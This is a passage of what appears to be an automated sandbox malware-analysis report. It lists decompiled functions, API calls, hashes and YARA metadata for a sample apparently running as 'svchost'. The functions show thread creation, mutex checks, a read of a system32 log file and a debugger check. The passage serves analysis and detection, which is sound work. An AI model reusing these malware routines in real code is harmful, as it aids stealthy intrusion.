                                                • Instruction Fuzzy Hash: EC110274500611EBEF49EFA9CA84FADBBB2FF85304F054108D45997250DBB0B924CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD54CC0 Relevance: 6.0, APIs: 4, Instructions: 41threadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E6FD54CC0(intOrPtr __ecx, void* __esi) {
				long _v8;
				void _t5;
				void* _t6;
				struct _SECURITY_ATTRIBUTES** _t8;
				struct _SECURITY_ATTRIBUTES** _t10;
				intOrPtr _t13;
				void* _t15;
				void _t16;
				void* _t18;

				_t15 = __esi;
				_push(__ecx);
				_t13 = __ecx;
				if(__ecx != 0) {
					_t21 =  *0x6fd6b718;
					if( *0x6fd6b718 == 0) {
						_t8 = E6FD559AF(__esi, _t21, 4);
						_t18 = _t18 + 4;
						 *0x6fd6b718 = _t8;
						 *_t8 = 0;
						 *_t8 = 0x6fd65f58;
					}
					_push(_t15);
					_t5 = E6FD559AF(_t15, _t21, 4);
					_t10 =  *0x6fd6b718; // 0x3017218
					_t16 = _t5;
					 *_t16 = _t10;
					_t6 = E6FD559AF(_t16, _t21, 8);
					 *((intOrPtr*)(_t6 + 4)) = _t13;
					 *_t6 = _t16;
					_v8 = 0;
					CreateThread(0, 0, E6FD54CA0, _t6, 0,  &_v8); // executed
				}
				return 0;
			}












                                                0x6fd54cc0
                                                0x6fd54cc3
                                                0x6fd54cc5
                                                0x6fd54cc9
                                                0x6fd54ccb
                                                0x6fd54cd2
                                                0x6fd54cd6
                                                0x6fd54cdb
                                                0x6fd54cde
                                                0x6fd54ce3
                                                0x6fd54ce9
                                                0x6fd54ce9
                                                0x6fd54cef
                                                0x6fd54cf2
                                                0x6fd54cf7
                                                0x6fd54cfd
                                                0x6fd54d01
                                                0x6fd54d03
                                                0x6fd54d0e
                                                0x6fd54d1c
                                                0x6fd54d20
                                                0x6fd54d27
                                                0x6fd54d2d
                                                0x6fd54d34

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 80ad869bdeb623c23aa924d56b7991d9ec4c058741464275859e2400e8d32bfb
                                                • Instruction ID: f94d2e1b3500ca23f772efdd950eb05a18a0d6ebd816eb6b2a47b65f11ce39e5
                                                • Opcode Fuzzy Hash: 80ad869bdeb623c23aa924d56b7991d9ec4c058741464275859e2400e8d32bfb
                                                • Instruction Fuzzy Hash: F3F0AFB4940304AFFF508F45C816B667BA8EB82734F14105AE6084B2D0EBB27964CBB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD553D0 Relevance: 6.0, APIs: 4, Instructions: 33sleepthreadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD553D0(void* __edx, void* __eflags) {
				void* __edi;
				void* _t1;
				void* _t3;
				void* _t7;

				Sleep(0x1388); // executed
				_t1 = E6FD549C0(Sleep); // executed
				if(_t1 != 0) {
					_t3 = E6FD548C0(_t7); // executed
					if(_t3 != 0 && E6FD54950() != 0) {
						CreateThread(0, 0, E6FD55290, 0, 0, 0); // executed
						CreateThread(0, 0, E6FD55320, 0, 0, 0); // executed
						L4:
						Sleep(0x1388); // executed
						goto L4;
					}
				}
				return 0;
			}







                                                0x6fd553dc
                                                0x6fd553de
                                                0x6fd553e5
                                                0x6fd553e7
                                                0x6fd553ee
                                                0x6fd55408
                                                0x6fd5541d
                                                0x6fd55423
                                                0x6fd55428
                                                0x00000000
                                                0x6fd55428
                                                0x6fd553ee
                                                0x6fd5542f

                                                APIs
                                                • Sleep.KERNELBASE(00001388,?,6FD5546F), ref: 6FD553DC
                                                  • Part of subcall function 6FD549C0: CreateMutexA.KERNELBASE ref: 6FD54A0D
                                                  • Part of subcall function 6FD549C0: GetLastError.KERNEL32 ref: 6FD54A15
                                                  • Part of subcall function 6FD549C0: ReleaseMutex.KERNEL32(00000000), ref: 6FD54A2C
                                                  • Part of subcall function 6FD549C0: CloseHandle.KERNEL32(00000000), ref: 6FD54A33
                                                  • Part of subcall function 6FD548C0: EnterCriticalSection.KERNEL32(6FD6AC7C,?,6FD5546F), ref: 6FD548D0
                                                  • Part of subcall function 6FD548C0: LocalFree.KERNELBASE(00000000), ref: 6FD54909
                                                  • Part of subcall function 6FD548C0: LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD54928
                                                  • Part of subcall function 6FD54950: new.LIBCMT ref: 6FD54962
                                                  • Part of subcall function 6FD54950: LocalFree.KERNEL32(00000000), ref: 6FD549A9
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005290,00000000,00000000,00000000), ref: 6FD55408
                                                • CreateThread.KERNELBASE(00000000,00000000,6FD55320,00000000,00000000,00000000), ref: 6FD5541D
                                                • Sleep.KERNELBASE(00001388,?,6FD5546F), ref: 6FD55428
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Create$CriticalFreeLocalMutexSectionSleepThread$CloseEnterErrorHandleLastLeaveRelease
                                                • String ID:
                                                • API String ID: 3843465970-0
                                                • Opcode ID: 526a0971e5053b39539fffd79c3228c92fc4ec1614244668e3b180fc16c06d78
                                                • Instruction ID: 60de78d518344bdf0b139654e7247d013111541df5b3d96afa1daba05eb31657
                                                • Opcode Fuzzy Hash: 526a0971e5053b39539fffd79c3228c92fc4ec1614244668e3b180fc16c06d78
                                                • Instruction Fuzzy Hash: 23F0C2312C4700B5FEA267F82E06FA823115B86F9EF600141F700BE0C09AC170394A2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD548C0 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E6FD548C0(void* __ecx) {
				void* _v8;
				char _v12;
				void* _t12;
				signed int _t15;
				void* _t19;
				intOrPtr _t21;

				_t19 = __ecx;
				E6FD547E0();
				EnterCriticalSection(0x6fd6ac7c);
				_v8 = 0;
				_v12 = 0;
				_t12 = E6FD53EB0( &_v8,  &_v12); // executed
				if(_t12 == 0) {
					L4:
					_push(0x6fd6ac7c);
					goto L5;
				} else {
					_push(_t19);
					E6FD53FA0(_v8, _v12); // executed
					_t15 = LocalFree(_v8);
					_t21 =  *0x6fd6ac98; // 0x14
					if((_t15 & 0xffffff00 | _t21 != 0x00000000) == 0) {
						goto L4;
					} else {
						_push(0x6fd6ac7c);
						if(_t21 < 0xf) {
							L5:
							LeaveCriticalSection();
							return 0;
						} else {
							LeaveCriticalSection();
							E6FD54330();
							return 1;
						}
					}
				}
			}









                                                0x6fd548c0
                                                0x6fd548c6
                                                0x6fd548d0
                                                0x6fd548d9
                                                0x6fd548e4
                                                0x6fd548eb
                                                0x6fd548f5
                                                0x6fd54939
                                                0x6fd54939
                                                0x00000000
                                                0x6fd548f7
                                                0x6fd548fa
                                                0x6fd548fe
                                                0x6fd54909
                                                0x6fd5490f
                                                0x6fd5491c
                                                0x00000000
                                                0x6fd5491e
                                                0x6fd5491e
                                                0x6fd54926
                                                0x6fd5493e
                                                0x6fd5493e
                                                0x6fd54949
                                                0x6fd54928
                                                0x6fd54928
                                                0x6fd5492e
                                                0x6fd54938
                                                0x6fd54938
                                                0x6fd54926
                                                0x6fd5491c

                                                APIs
                                                  • Part of subcall function 6FD547E0: EnterCriticalSection.KERNEL32(6FD6AC7C,73B76490,?,?,6FD548CB,?,6FD5546F), ref: 6FD547E8
                                                  • Part of subcall function 6FD547E0: LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD54818
                                                  • Part of subcall function 6FD547E0: LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD54822
                                                  • Part of subcall function 6FD547E0: LeaveCriticalSection.KERNEL32(6FD6AC7C,?,?,6FD548CB,?,6FD5546F), ref: 6FD5484E
                                                  • Part of subcall function 6FD547E0: EnterCriticalSection.KERNEL32(6FD6AC54,?,?,6FD548CB,?,6FD5546F), ref: 6FD54859
                                                  • Part of subcall function 6FD547E0: LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD5487E
                                                  • Part of subcall function 6FD547E0: LeaveCriticalSection.KERNEL32(6FD6AC54,?,?,6FD548CB,?,6FD5546F), ref: 6FD548AA
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C,?,6FD5546F), ref: 6FD548D0
                                                  • Part of subcall function 6FD53EB0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,6FD548F0,?), ref: 6FD53ED1
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5493E
                                                  • Part of subcall function 6FD53FA0: new.LIBCMT ref: 6FD53FC2
                                                  • Part of subcall function 6FD53FA0: LocalAlloc.KERNEL32(00000040,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD54013
                                                  • Part of subcall function 6FD53FA0: LocalAlloc.KERNEL32(00000040,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD5401F
                                                  • Part of subcall function 6FD53FA0: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD5405C
                                                  • Part of subcall function 6FD53FA0: LocalFree.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,73B76490), ref: 6FD540AC
                                                • LocalFree.KERNELBASE(00000000), ref: 6FD54909
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD54928
                                                  • Part of subcall function 6FD54330: EnterCriticalSection.KERNEL32(6FD6AC7C,?,6FD54933), ref: 6FD54336
                                                  • Part of subcall function 6FD54330: LocalFree.KERNELBASE(?,73B76490,?,?,6FD54933), ref: 6FD543A4
                                                  • Part of subcall function 6FD54330: LocalFree.KERNELBASE(?,73B76490,?,?,6FD54933), ref: 6FD543EF
                                                  • Part of subcall function 6FD54330: LocalFree.KERNEL32(?,73B76490,?,?,6FD54933), ref: 6FD54400
                                                  • Part of subcall function 6FD54330: LeaveCriticalSection.KERNEL32(6FD6AC7C,?,6FD54933), ref: 6FD54422
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Local$CriticalSection$Free$Leave$Enter$Alloc$CreateFile
                                                • String ID:
                                                • API String ID: 3831489965-0
                                                • Opcode ID: 0527b808ca353ad1894e513da1410b7e3e15cbd463e05e033135f24cd79415f5
                                                • Instruction ID: 3947eea66175aaa9aa52da1020a27cd0cd41817de60d9959b5c4841e17421bcb
                                                • Opcode Fuzzy Hash: 0527b808ca353ad1894e513da1410b7e3e15cbd463e05e033135f24cd79415f5
                                                • Instruction Fuzzy Hash: F4018178800219EBDF409FA0E866BED7775AF07219F040199E84A57241DB317A39ABA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD55290 Relevance: 2.5, APIs: 2, Instructions: 47COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD55290() {
				char _v8;
				char _v12;
				void* __esi;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr* _t15;
				intOrPtr* _t17;
				signed int _t22;

				EnterCriticalSection(0x6fd6ac7c);
				_t14 =  *0x6fd6ac98; // 0x14
				_t22 = 0;
				if(_t14 != 0) {
					do {
						_t17 = 0;
						if(_t22 < _t14) {
							_t11 =  *0x6fd6ac94; // 0x304ebb8
							_t17 =  *((intOrPtr*)(_t11 + _t22 * 4));
						}
						if( *((char*)(_t17 + 0x3c)) != 0 &&  *((intOrPtr*)(_t17 + 0x4c)) == 0x86) {
							_t15 =  *0x6fd6b718; // 0x3017218
							_v8 = 0;
							_v12 = 0;
							_t11 =  *((intOrPtr*)( *((intOrPtr*)( *_t15 + 4))))( *_t17,  &_v8,  &_v12);
							if(_t11 != 0) {
								_t11 = E6FD54CC0(_v8, _t22);
							}
							_t14 =  *0x6fd6ac98; // 0x14
						}
						_t22 = _t22 + 1;
					} while (_t22 < _t14);
				}
				LeaveCriticalSection(0x6fd6ac7c);
				return _t11;
			}











                                                0x6fd5529c
                                                0x6fd552a2
                                                0x6fd552a8
                                                0x6fd552ac
                                                0x6fd552b0
                                                0x6fd552b0
                                                0x6fd552b4
                                                0x6fd552b6
                                                0x6fd552bb
                                                0x6fd552bb
                                                0x6fd552c2
                                                0x6fd552cd
                                                0x6fd552d7
                                                0x6fd552e1
                                                0x6fd552f0
                                                0x6fd552f4
                                                0x6fd552f9
                                                0x6fd552f9
                                                0x6fd552fe
                                                0x6fd552fe
                                                0x6fd55304
                                                0x6fd55305
                                                0x6fd55309
                                                0x6fd5530f
                                                0x6fd55319

                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5529C
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5530F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: d70462e7d7ba9e96bc2d03a8bd6ecc4d4105961cd19021fa533029ff03872601
                                                • Instruction ID: 56fccfe463f1ae518aafde4aa341363ddd5cc79f5ae0243fdf39a72daa9d32e5
                                                • Opcode Fuzzy Hash: d70462e7d7ba9e96bc2d03a8bd6ecc4d4105961cd19021fa533029ff03872601
                                                • Instruction Fuzzy Hash: 1C01F134500225DBEF52DB99D884FEDBBB1FF8631AF010099D8456B254CB70B965CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039923B0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000011F0,?,00000000,00000000), ref: 039923CC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: bfbf2ff7a47345852df780ece80a4749cb84ead36ffef8d53aeb44ae5115d571
                                                • Instruction ID: 5db4dbc6846c1d245931fce604aefbb1eb4666be408056a3379d207c9d946b5a
                                                • Opcode Fuzzy Hash: bfbf2ff7a47345852df780ece80a4749cb84ead36ffef8d53aeb44ae5115d571
                                                • Instruction Fuzzy Hash: 08D0C93128430C7BFB20AA49AC46F4D7358E718F11F244801F624AA2C1C5E1F4605618
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 039AFB3A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,039AFE59,?,00000000), ref: 039AFBD3
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,039AFE59,?,00000000), ref: 039AFBFC
                                                • GetACP.KERNEL32(?,?,039AFE59,?,00000000), ref: 039AFC11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: af0c30d598caa44b6dceaaba04d795e226bd8ab0c8a678fb579a0ec64f26f380
                                                • Instruction ID: 2ccc183be7978ff752e3238abdf658e9c415433d7105b5c3457ac9bf66dd0dc4
                                                • Opcode Fuzzy Hash: af0c30d598caa44b6dceaaba04d795e226bd8ab0c8a678fb579a0ec64f26f380
                                                • Instruction Fuzzy Hash: C5218632604902AAD734DF5DDE14A97B3FEAF44BA4B4986A4E90FD7100E732D941C7D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AFD0E Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F41
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 039AFE1A
                                                • IsValidCodePage.KERNEL32(00000000), ref: 039AFE75
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 039AFE84
                                                • GetLocaleInfoW.KERNEL32(?,00001001,039A7203,00000040,?,039A7323,00000055,00000000,?,?,00000055,00000000), ref: 039AFECC
                                                • GetLocaleInfoW.KERNEL32(?,00001002,039A7283,00000040), ref: 039AFEEB
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                • String ID:
                                                • API String ID: 745075371-0
                                                • Opcode ID: 6c3cabcdb998c08b40ae99b78623b71c00ab92bf455bc9e62ef00e8d658860ea
                                                • Instruction ID: c5ec6242c5ea861d3d6efa8d2b221947553614ebecafc02c92ca9177b2a0228d
                                                • Opcode Fuzzy Hash: 6c3cabcdb998c08b40ae99b78623b71c00ab92bf455bc9e62ef00e8d658860ea
                                                • Instruction Fuzzy Hash: DA51C676A00619AFDF21EFADDC44ABEB3BCEF54340F184665E906EB140E7709904CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03998A9B Relevance: 6.1, APIs: 4, Instructions: 75COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,73B76490,73BCF7E0), ref: 03998AA8
                                                • IsDebuggerPresent.KERNEL32(?,?,?,00000017,73B76490,73BCF7E0), ref: 03998B70
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,73B76490,73BCF7E0), ref: 03998B8F
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,73B76490,73BCF7E0), ref: 03998B99
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: bddcc24c3546070bec02c55868a68398c1f7ead316077c87a7cdf63df0531256
                                                • Instruction ID: ec8ab4e47d123c455f996517b444176a73ec7806c69add73146830243a876259
                                                • Opcode Fuzzy Hash: bddcc24c3546070bec02c55868a68398c1f7ead316077c87a7cdf63df0531256
                                                • Instruction Fuzzy Hash: E931FAB5D4622C9BDF10DFA5D9886DDBBB8EF09344F1041EAE40DAB210EB715A84CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A51B5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,039A6CC3,?,00000004), ref: 039A5208
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: GetLocaleInfoEx
                                                • API String ID: 2299586839-2904428671
                                                • Opcode ID: d98c304034fd4c9d41a88c1e33e44f884a86b253bfbbf5f2010a741c16f027ae
                                                • Instruction ID: 3554d6a9a81908e879f1c0fb6490bde4f9f6950d6dd71995660a79955870555a
                                                • Opcode Fuzzy Hash: d98c304034fd4c9d41a88c1e33e44f884a86b253bfbbf5f2010a741c16f027ae
                                                • Instruction Fuzzy Hash: 6CF0F031B01218BBDF02EFAA9D05EAF7B65EB85750F014209FC052E251DA728D20AAD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AF3D6 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,039A720A,?,?,?,?,039A6CC3,?,00000004), ref: 039AF4B8
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,039A720A,00000000,039A732A), ref: 039AF5F9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                • String ID:
                                                • API String ID: 1661935332-0
                                                • Opcode ID: 7083ccf0e19957b36b611b81989df5ac6da934044a4ba674c1cf35550fc542ec
                                                • Instruction ID: a388dc8f78f6a7c1b6bb127c84e83d2d971bb7f31d786f8da4cf9904a32b5a0a
                                                • Opcode Fuzzy Hash: 7083ccf0e19957b36b611b81989df5ac6da934044a4ba674c1cf35550fc542ec
                                                • Instruction Fuzzy Hash: F461E976A00B06AAD724EF7CCC45AB7B3ECEF48740F194669E946DB180EB70D54087E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AFA11 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F41
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 039AFA65
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                • Opcode ID: 83a1c46cffe90023646ec256352b65262c4683222cc6c059db7034476e8c1bd3
                                                • Instruction ID: d11f2727badc593259fd8982ce8a477a4037992d150d1663cd7dc83445c1de57
                                                • Opcode Fuzzy Hash: 83a1c46cffe90023646ec256352b65262c4683222cc6c059db7034476e8c1bd3
                                                • Instruction Fuzzy Hash: 7021D432510A06ABEB24EE6DDC41FBA73ACEF44754F1442BAED02CA140FB759941CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AF699 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • EnumSystemLocalesW.KERNEL32(039AF7C1,00000001,00000000,?,039A7203,?,039AFDEE,00000000,?,?,?), ref: 039AF70B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                • Opcode ID: e8844f6d26f981726c0f7e11af09c6e3054eb93b88a9b657b32b3f703feef34c
                                                • Instruction ID: 7f7fea91d8052d7c5ad915d61d5c25c5806cb86ff57839823d532cf8b2536259
                                                • Opcode Fuzzy Hash: e8844f6d26f981726c0f7e11af09c6e3054eb93b88a9b657b32b3f703feef34c
                                                • Instruction Fuzzy Hash: 9711C63B200B055FDB18EF3D98915BABB96FF80359B19452DD9874BA40D3716542CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AFC41 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,039AFABC,00000000,00000000,?), ref: 039AFC6D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
